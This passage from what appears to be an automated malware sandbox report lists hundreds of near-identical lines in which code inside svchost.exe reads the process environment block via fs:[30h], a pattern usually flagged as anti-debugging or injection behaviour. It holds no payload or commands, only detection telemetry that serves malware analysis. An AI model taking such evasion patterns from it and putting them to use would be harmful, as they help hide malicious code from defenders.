            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h] 2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h] 2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h] 2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h] 2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h] 2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h] 2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h] 2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h] 2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h] 2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h] 2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h] 2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03632582 mov eax, dword ptr fs:[00000030h] 2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h] 2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03664588 mov eax, dword ptr fs:[00000030h] 2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h] 2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h] 2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h] 2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h] 2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h] 2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h] 2_2_0366E443
